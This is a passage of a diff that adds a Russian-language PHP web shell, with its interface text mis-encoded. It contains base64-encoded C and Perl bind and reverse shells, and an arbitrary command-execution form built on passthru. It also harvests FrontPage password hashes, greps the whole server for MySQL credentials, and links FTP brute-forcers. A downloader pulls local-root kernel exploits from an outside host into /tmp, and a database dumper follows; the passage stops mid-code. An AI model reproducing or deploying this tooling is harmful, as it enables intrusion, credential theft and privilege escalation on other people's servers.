+OWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2N
+rZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2F
+kZHIgKikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB
+7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHV
+wMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ
+6IiwxMCk7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyh
+hcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byByNTcgc2hlbGwgJiYgL2J
+pbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGN
+sb3NlKG5ld2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW5
+0ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVudGVyZWQpO2krKykgDQp7DQppZih
+lbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID0
+9ICdccicpDQplbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCk
+pDQpyZXR1cm4gMDsNCn0=";
+
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZi
+AoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2
+NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORV
+QsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQ
+pzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZH
+JfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw
+0KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCm
+FjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaW
+YgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+Jk
+NPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ0
+9OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpleGl0IDA7DQp9DQp9";
+
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ
+HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ
+DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ
+HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L
+CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd
+GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka
+WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO
+iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR
+VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK
+FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0
+KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10
+pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJ
+ybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2l
+uLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA
+9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMSt
+zdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVB
+QUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4
+sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCg
+pIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1
+zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWN
+sKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+
+if(isset($uploadphp))
+{
+$socket=fsockopen($iphost,$loadport);					//connect
+fputs($socket,"GET $loadfile HTTP/1.0\nHOST:cd\n\n");	//request
+while(fgets($socket,31337)!="\r\n" && !feof($socket)) {
+unset($buffer); }
+while(!feof($socket)) $buffer.=fread($socket, 1024);
+$file_size=strlen($buffer);
+$f=fopen($loadnewname,"wb+");
+fwrite($f, $buffer, $file_size);
+echo "Ðàçìåð çàãðóæåííîãî ôàéëà: $file_size <b><br><br>" ;
+}
+
+if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
+elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
+else {$ac = "navigation";}
+
+
+
+switch($ac) {
+
+// Shell
+case "shell":
+echo "<SCRIPT LANGUAGE='JavaScript'>
+<!--
+function pi(str) {
+	document.command.cmd.value = str;
+	document.command.cmd.focus();
+}
+//-->
+</SCRIPT>";
+
+/* command execute */
+if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -lad"; }
+
+if (($_POST['alias']) AND ($_POST['alias']!==""))
+ {
+ foreach ($aliases as $alias_name=>$alias_cmd) {
+                                               if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;}
+                                               }
+ }
+
+
+echo "<font face=Verdana size=-2>Âûïîëíåííàÿ êîìàíäà: <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
+echo "<b>";
+echo "<div align=center><textarea name=report cols=145 rows=20>";
+echo "".passthru($_POST['cmd'])."";
+echo "</textarea></div>";
+echo "</b>";
+?>
+</td></tr>
+
+<tr><b><div align=center>:: Âûïîëíåíèå êîìàíä íà ñåðâåðå ::</div></b></font></td></tr>
+<tr><td height=23>
+<TR>
+	<CENTER>
+ <TD><A HREF="JavaScript:pi('cd ');" class=fcom>| cd</A> |</TD>
+	<TD><A HREF="JavaScript:pi('cat ');" class=fcom>| cat</A> |</TD>
+	<TD><A HREF="JavaScript:pi('echo ');" class=fcom>echo</A> |</TD>
+	<TD><A HREF="JavaScript:pi('wget ');" class=fcom>wget</A> |</TD>
+	<TD><A HREF="JavaScript:pi('rm ');" class=fcom>rm</A> |</TD>
+	<TD><A HREF="JavaScript:pi('mysqldump ');" class=fcom>mysqldump</A> |</TD>
+	<TD><A HREF="JavaScript:pi('who');" class=fcom>who</A> |</TD>
+	<TD><A HREF="JavaScript:pi('ps -ax');" class=fcom>ps -ax</A> |</TD>
+  <TD><A HREF="JavaScript:pi('cp ');" class=fcom>cp</A> |</TD>
+  <TD><A HREF="JavaScript:pi('pwd');" class=fcom>pwd</A> |</TD>
+ <TD><A HREF="JavaScript:pi('perl  ');" class=fcom>perl</A> |</TD>
+ <TD><A HREF="JavaScript:pi('gcc ');" class=fcom>gcc</A> |</TD>
+ <TD><A HREF="JavaScript:pi('locate ');" class=fcom>locate</A> |</TD>
+  <TD><A HREF="JavaScript:pi('find ');" class=fcom>find</A> |</TD>
+  <TD><A HREF="JavaScript:pi('ls -lad');" class=fcom>ls -lad</A> |</TD>
+       </CENTER>           	
+</TR>
+
+<?
+/* command execute form */
+echo "<form name=command method=post>";
+
+echo "<b>Âûïîëíèòü êîìàíäó</b>";
+echo "<input type=text name=cmd size=85><br>";
+echo "<b>Ðàáî÷àÿ äèðåêòîðèÿ &nbsp;</b>";
+if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; }
+else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; }
+echo "<input type=submit name=submit value=Âûïîëíèòü>";
+
+echo "</form>";
+
+/* aliases form */
+echo "<form name=aliases method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Âûáåðèòå àëèàñ<font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<select name=alias>";
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ echo "<option>$alias_name</option>";
+ }
+ echo "</select>";
+if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
+else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
+echo "&nbsp;&nbsp;<input type=submit name=submit value=Âûïîëíèòü>";
+echo "</font>";
+echo "</form>";
+
+
+break;
+case "art":
+echo "<a href='?ac=frontpage'><b>FrontPage Exploit by Nitrex</b></a><br>
+Ýêñïëîéò äëÿ FrontPage. Ñîáèðàåò ÷èòàåìûå .htpassword ôàéëû ïî âñåìó ñåðâåðó. Ïîçâîëÿåò ñîçäàòü íåõèëóþ áàçó âñåõ ñàéòîâ â âèäå ëîãèí:ïàðîëü îò õîñòåðà, òî åñòü ïàðîëè ê FrontPage ïîäõîäÿò ê FTP è äðóãèì ñåðâèñàì ñåðâåðà. Ðàññøèôðîâêà ïðîèçâîäèòñÿ ñ ïîìîùüþ John The Ripper (Standart/DES).<br><br>
+<a href='?ac=dbexploit'><b>MySQL Find Config Exploit by DreAmeRz</b></a><br>
+Ýêñïëîèò, ïîçâîëÿþùèé îáëåã÷èòü ïîèñê ïàðîëåé ê áàçå äàííûõ. Ïðîèçâîäèòñÿ ïîèñê ôàéëîâ ñ óïîìèíàíèåì ðÿäà ñòðîê, óêàçûâàþùèõ íà êîííåêò ê MySQL. Òàêæå âîçìîæíî ñîâïàäåíèå ïàðîëåé ñ äðóãèìè ñåðâèñàìè ñåðâåðà. Ïàðîëè â áîëüøåíñòâå ñëó÷àåâ èëè âîâñå íå çàøèôðîâàíû, èëè çàøèôðîâàíû îáðàòèìûì àëãîðèòìîì. Ïðîàíàëèçèðîâàâ ôàéëû, óêàçàííûå ýêñïëîèòîì, âû áûñòðî íàéäåòå ïàðîëü ê MySQL.<br><br>
+<a href='?ac=ftp'><b>FTP Brut by xoce</b></a><br>
+Ïîëíîöåííûé áðóòôîðñåð, ðàáîòàþùèé ïî ìåòîäó ïîäñòàíîâêè ïàðîëåé, êîòîðûå áåðåò èç ôàéëà. Ôàéë ãåíåðèðóåòñÿ ñàì, âû òîëüêî óêàçûâàåòå ÷èñëî ïàðîëåé è... âñå - ïåðåáîð íà÷èíàåòñÿ!!! Ñ ïîìîùüþ äàííîãî áðóòôîðñåðà âû ñìîæåòå ïîäîáðàòü ïàðîëü ê ëþáîìó õîñòèíãó áåç ïðîáëåì! ×òîáû áûëî ÷òî ïåðåáèðàòü, áûëà äîáàâëåíà áàçà ïàðîëåé, êîòîðàÿ ãåíåðèðóåòñÿ íà ëåòó (íå ïèøèòå áîëüøèå öèôðû â êîëè÷åñòâå ïàðîëåé, òàê êàê ýòî ñåðüåçíàÿ íàãðóçêà íà ñåðâåð! 10000 âïîëíå õâàòèò).<br><br>
+<a href='?ac=ftppass'><b>FTP login:login Brut by Terabyte</b></a><br>
+Ýêñïëîèò ïîçâîëÿåò ïåðåáðàòü àêêàóíò íà FTP íà ñâÿçêó login:login. ×åì áîëüøå þçåðîâ â /etc/passwd, òåì áîëüøå âåðîÿòíîñòü óäà÷íîé ðàáîòû ýêñïëîèòà.<br><br>
+<a href='?ac=shell'><b>Íåêîòîðûå äðóãèå ìèíè-ýêñïëîèòû ïðèâåäåíû çäåñü â àëüÿñàõ.</b></a><br>";
+break;
+case "frontpage":
+$p=getenv("DOCUMENT_ROOT");
+if(exec("cat /etc/passwd")){
+$ex=explode("/", $p);
+$do_login=substr($p,0,strpos($p,$ex[2]));
+$next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2]));
+exec("cat /etc/passwd", $passwd);
+for($i=0; $i<=count($passwd); $i++) {
+$xz=explode(":", $passwd[$i]);
+$file="/".$do_login.$xz[0].$next_login."/_vti_pvt/service.pwd";
+if(exec("cat ".$file)){
+exec("cat ".$file,$open);
+$a=$open[count($open)-1];
+$fr=strpos($a, ":");
+$open1=substr($a, $fr);
+if($xz[4]=='') {
+$file1="/".$do_login.$xz[0].$next_login."/_vti_pvt/.htaccess";
+Unset($domain);
+exec("cat ".$file1,$domain);
+$domain1=explode(" ",$domain[8]);
+$xz[4]=$domain1[1];
+}
+echo $xz[0].$open1.":".$xz[2].":".$xz[3].":".$xz[4].":".$xz[5].":".$xz[6]."<br>";
+} } 
+}
+elseif(is_file("/etc/passwd")){
+$ex=explode("/", $p);
+$passwd="/etc/passwd";
+echo "Ïóòü:&nbsp".$p."<br>"; 
+$do_login=substr($p,0,strpos($p,$ex[2]));
+$next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2]));
+if(is_file($passwd)) {
+$open=fopen($passwd,"r");
+while (!feof($open)) {
+$str=fgets($open, 100);
+$mas=explode(":", $str);
+$file="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/service.pwd";
+if(is_file($file)) {
+echo $mas[0];
+$open1=fopen($file, "r");
+$str1=fread($open1,filesize($file));
+fclose($open1);
+$fr=strpos($str1, ":");
+$str2=substr($str1, $fr);
+$str2=rtrim($str2);
+//
+if($mas[4]=='') {
+$file1="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/.htaccess";
+$open2=fopen($file1,"r");
+$domain=fread($open2,filesize($file1));
+fclose($open2);
+$domain1=substr($domain,106,110);
+$domain2=explode("AuthUserFile",$domain1);
+$mas[4]=$domain2[0];
+}
+//
+echo $str2.":".$mas[2].":".$mas[3].":".$mas[4].":".$mas[5].":".$mas[6]."<br>";
+}
+} 
+fclose($open);
+}
+}
+else{
+echo "Ñ ïàññîì îáëîì :(((";
+}
+break;
+case "dbexploit":
+echo "<PRE>";
+echo "<b>Â ôàéëå ïðèñóòñòâóåò ôóíêöèÿ mysql_connect: </b><br>";
+exec("find / -name *.php | xargs grep -li mysql_connect");
+exec("find / -name *.inc | xargs grep -li mysql_connect");
+exec("find / -name *.inc.php | xargs grep -li mysql_connect");
+echo "<b>Â ôàéëå ïðèñóòñòâóåò ôóíêöèÿ mysql_select_db: </b><br>";
+exec("find / -name *.php | xargs grep -li mysql_select_db");
+exec("find / -name *.inc | xargs grep -li mysql_select_db");
+exec("find / -name *.inc.php | xargs grep -li mysql_select_db");
+echo "<b>Â ôàéëå ïðèñóòñòâóåò óïîìèíàíèå ïàðîëÿ: </b><br>";
+exec("find / -name *.php | xargs grep -li $password");
+exec("find / -name *.inc | xargs grep -li $password");
+exec("find / -name *.inc.php | xargs grep -li $password");
+exec("find / -name *.php | xargs grep -li $pass");
+exec("find / -name *.inc | xargs grep -li $pass");
+exec("find / -name *.inc.php | xargs grep -li $pass");
+echo "<b>Â ôàéëå ïðèñóòñòâóåò ñëîâî localhost: </b><br>";
+exec("find / -name *.php | xargs grep -li localhost");
+exec("find / -name *.inc | xargs grep -li localhost");
+exec("find / -name *.inc.php | xargs grep -li localhost");
+echo "</PRE>"; 
+break;
+// ñïèñîê ïðîöåññîâ
+case "ps":
+echo "<b>Ïðîöåññû â ñèñòåìå:</b><br>";
+ 
+  echo "<br>";
+  if ($pid)
+  {
+   if (!$sig) {$sig = 9;}
+   echo "Îòïðàâëåíèå êîìàíäû ".$sig." to #".$pid."... ";
+   $ret = posix_kill($pid,$sig);
+   if ($ret) {echo "Âñå, ïðîöåññ óáèò, àìèíü";}
+   else {echo "ÎØÈÁÊÀ! ".htmlspecialchars($sig).", â ïðîöåññå #".htmlspecialchars($pid).".";}
+  }
+  $ret = `ps -aux`;
+  if (!$ret) {echo "Íåâîçìîæíî îòîáðàçèòü ñïèñîê ïðîöåññîâ! Âèäíî, çëîé àäìèí çàïðåòèë ps";}
+  else
+  {
+   $ret = htmlspecialchars($ret);
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   if (empty($ps_aux_sort)) {$ps_aux_sort = $sort_default;}
+   if (!is_numeric($ps_aux_sort[0])) {$ps_aux_sort[0] = 0;}
+   $k = $ps_aux_sort[0];
+   if ($ps_aux_sort[1] != "a") {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."a\"></a>";}
+   else {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."d\"></a>";}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$i.$ps_aux_sort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+	{
+	 echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10,count($line)));
+     $line = array_slice($line,0,11);
+     $line[] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+   $head[$k] = "<b>".$head[$k]."</b>".$y;
+   $head[] = "<b>ACTION</b>";
+   $v = $ps_aux_sort[0];
+   usort($prcs,"tabsort");
+   if ($ps_aux_sort[1] == "d") {$prcs = array_reverse($prcs);}
+   $tab = array();
+   $tab[] = $head;
+   $tab = array_merge($tab,$prcs);
+   echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=white borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+   foreach($tab as $k)
+   {
+    echo "<tr>";
+    foreach($k as $v) {echo "<td>".$v."</td>";}
+    echo "</tr>";
+   }
+   echo "</table>";
+  }
+break;
+// exploits for root...
+case "exploits":
+// thanks to xoce
+$public_site = "http://hackru.info/adm/exploits/public_exploits";
+$private_site = "http://hackru.info/adm/exploits/private_exploits";
+echo"Ýòîò ðàçäåë ñîçäàí ïî ðÿäó ïðè÷èí. Âî-ïåðâûõ, óæå íàäîåëî èñêàòü îäíè è òåæå ýêñïëîèòû, âî-âòîðûõ - êîìïèëèðîâàíèå è èñïðàâëåíèå ñîðöîâ ïîä êîíêðåòíóþ ïëàòôîðìó óæå òîæå íå ïðèíîñèò óäîâîëüñòâèÿ. Âñå ýêñïëîèòû ñêîìïèëèðîâàíû è íàñòðîåíû. Ñàìîìó êîìïèëèðîâàòü áûëî âëîì, ïîýòîìó âîñïîëüçîâàëñÿ ãîòîâûìè :) Âûðàæàþ áëàãîäàðíîñòü xoce (hackru.info)<br><br>
+<a href='?ac=upload&file3=$public_site/m&file2=/tmp'>Local ROOT for linux 2.6.20 - mremap (./m)</a><br>
+<a href='?ac=upload&file3=$public_site/p&file2=/tmp'>Local ROOT for linux 2.6.20 - ptrace (./p)</a><br>
+<a href='?ac=upload&file3=$private_site/brk&file2=/tmp'>BRK - Local Root Unix 2.4.*(./brk)</a><br>
+<a href='?ac=upload&file3=$private_site/sortrace&file2=/tmp'>Traceroute v1.4a5 exploit by sorbo (./sortrace)</a><br>
+<a href='?ac=upload&file3=$private_site/root&file2=/tmp'>Local Root Unix 2.4.* (./root)</a><br>
+<a href='?ac=upload&file3=$private_site/sxp&file2=/tmp'>Sendmail 8.11.x exploit localroot (./sxp)</a><br>
+<a href='?ac=upload&file3=$private_site/ptrace_kmod&file2=/tmp'>Local Root Unix 2.4.* (./ptrace_kmod)</a><br>
+<a href='?ac=upload&file3=$private_site/mr1_a&file2=/tmp'>Local Root Unix 2.4.* (./mr1_a)</a><br><br>";
+echo "Èñïîëüçîâàíèå: çàõîäèòå â /tmp èç bash øåëëà è çàïóñêàéòå ôàéëû çàïóñêà.<br>
+Ïðèìåð: cd /tmp; ./m - âñå, ýêñïëîèò çàïóñòèòñÿ, è åñëè âñå ok, òî âû ïîëó÷èòå ïðàâà root'a!<br>
+Åñëè çäåñü íå îêàçàëîñü ïîäõîäÿùåãî ýêñïëîèòà, òî ïîñåòèòå <a href=http://www.web-hack.ru/exploits/>www.web-hack.ru/exploits/</a> è <a href=http://security.nnov.ru>security.nnov.ru</a>.";
+
+break;
+case "damp":
+
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+  $db = @mysql_connect('localhost',$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+
+   if(@mysql_select_db($_POST['mysql_db'],$db))
+    {
+     // èíôà î äàìïå
+     $sql1  = "# MySQL dump created by NRWS\r\n";
+     $sql1 .= "# homepage: http://www.Ru24-Team.NET\r\n";
+     $sql1 .= "# ---------------------------------\r\n";
+     $sql1 .= "#     date : ".date ("j F Y g:i")."\r\n";
+     $sql1 .= "# database : ".$_POST['mysql_db']."\r\n";
+     $sql1 .= "#    table : ".$_POST['mysql_tbl']."\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+
+     // ïîëó÷àåì òåêñò çàïðîñà ñîçäàíèÿ ñòðóêòóðû òàáëèöû
+     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+     $row   = @mysql_fetch_row($res);
+     $sql1 .= $row[1]."\r\n\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+
+     $sql2 = '';
+
+     // ïîëó÷àåì äàííûå òàáëèöû
+     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
+     if (@mysql_num_rows($res) > 0) {
+     while ($row = @mysql_fetch_assoc($res)) {
+     $keys = @implode("`, `", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".$values."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     echo "<center><b>Ãîòîâî! Äàìï ïðîøåë óäà÷íî!</b></center>";
+    // ïèøåì â ôàéë èëè âûâîäèì â áðàóçåð
+    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+    else { echo $sql1.$sql2; }
+    } // end if(@mysql_select_db($_POST['mysql_db'],$db))
+
+    else echo "Òàêîé ÁÄ íåò!";
+   @mysql_close($db);
+   } // end if($db)
+  else echo "Íåò êîííåêòà c ñåðâåðîì!";
+ } // end if(($_POST['dif']&&$fp)||(!$_POST['dif'])){
+ else if(!empty($_POST['dif'])&&!$fp) { echo "ÎØÈÁÊÀ, íåò ïðàâ çàïèñè â ôàéë!"; }
+
+break;
+// SQL Attack
+case "sql":
+echo "<form name='mysql_dump' action='?ac=damp' method='post'>";
+echo "&nbsp;Áàçà: &nbsp;<input type=text name=mysql_db size=15 value=";
+echo (!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"));
+echo ">";
+echo "&nbsp;Òàáëèöà: &nbsp;<input type=text name=mysql_tbl size=15 value=";
+echo (!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"));
+echo ">";
+echo "&nbsp;Ëîãèí: &nbsp;<input type=text name=mysql_l size=15 value=";
+echo (!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"));
+echo ">";
+echo "&nbsp;Ïàðîëü: &nbsp;<input type=text name=mysql_p size=15 value=";
+echo (!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"));
+echo ">";
+echo "<input type=hidden name=dir size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=mysql_dump>";
+echo "<br>&nbsp;Ñîõðàíèòü äàìï â ôàéëå: <input type=checkbox name=dif value=1 id=dif><input type=text name=dif_name size=85 value=";
+echo (!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"));
+echo ">";
+echo "<input type=submit name=submit value=Ñîõðàíèòü>" ;
+echo "</font>";
+echo "</form>"; 
+ print "<tr><td>";
+###
+
+@$php_self=$_GET['PHP_SELF'];
+@$from=$_GET['from'];
+@$to=$_GET['to'];
+@$adress=$_POST['adress'];
+@$port=$_POST['port'];
+@$login=$_POST['login'];
+@$pass=$_POST['pass'];
+@$adress=$_GET['adress'];
+@$port=$_GET['port'];
+@$login=$_GET['login'];
+@$pass=$_GET['pass'];
+if(!isset($adress)){$adress="localhost";}
+if(!isset($login)){$login="root";}
+if(!isset($pass)){$pass="";}
+if(!isset($port)){$port="3306";}
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+?>
+
+<body vLink=white>
+<font color=black face=verdana size=1>
+<form>  <? if(!@$conn){ ?>
+<table><tr><td valign=top>
+<input type=hidden name=ac value=sql>
+<tr><td valign=top>Õîñò: </tr><td><input name=adress value='<?=$adress?>' size=20></td></tr>
+<tr><td valign=top>Ïîðò: </tr><td><input name=port value='<?=$port?>' size=6></td></tr>
+<tr><Td valign=top>Ëîãèí: </td><td><input name=login value='<?=$login?>' size=10></td></tr>
+<tr><Td valign=top>Ïàðîëü: </td><td> <input name=pass value='<?=$pass?>' size=10>
+<input type=hidden name=p value=sql></td></tr>
+<tr><td></td><td><input type=submit name=conn value=Ïîäêëþ÷èòüñÿ></form></td></tr><?}?>
+<tr><td valign=top><? if(@$conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td>
+</td></tr>
+</table>
+<table width=100%><tr><td>
+<?
+@$conn=$_GET['conn'];
+@$adress=$_GET['adress'];
+@$port=$_GET['port'];
+@$login=$_GET['login'];
+@$pass=$_GET['pass'];
+if($conn){
+
+$serv = @mysql_connect("$adress:$port", "$login", "$pass") or die("ÎØÈÁÊÀ: ".mysql_error());
+if($serv){$status="Ïîäêëþ÷åí. :: <a href='$php_self?conn=0'>Âûéòè èç áàçû</a>";}else{$status="Îòêëþ÷åí.";}
+print "<b><font color=green>Ñòàòóñ: $status<br><br>";
+print "<table cellpadding=0 cellspacing=0><tr><td valign=top>";
+print "<font color=red>[Òàáëèöû]</font><Br><font color=white>";
+$res = mysql_list_dbs($serv);
+while ($str=mysql_fetch_row($res)){
+print "<b><a href='$php_self?ac=sql&base=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
+@$tc++;
+}
+$pro="&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+@$base=$_GET['base'];
+@$db=$_GET['db'];
+print "<font color=red>[Âñåãî òàáëèö: $tc]</font><br>$pro";
+if($base){
+print "<div align=left><font color=green>Òàáëèöà: [$tbl]</div></font><br>";
+$result=mysql_list_tables($db);
+while($str=mysql_fetch_array($result)){
+$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
+$records=mysql_fetch_array($c);
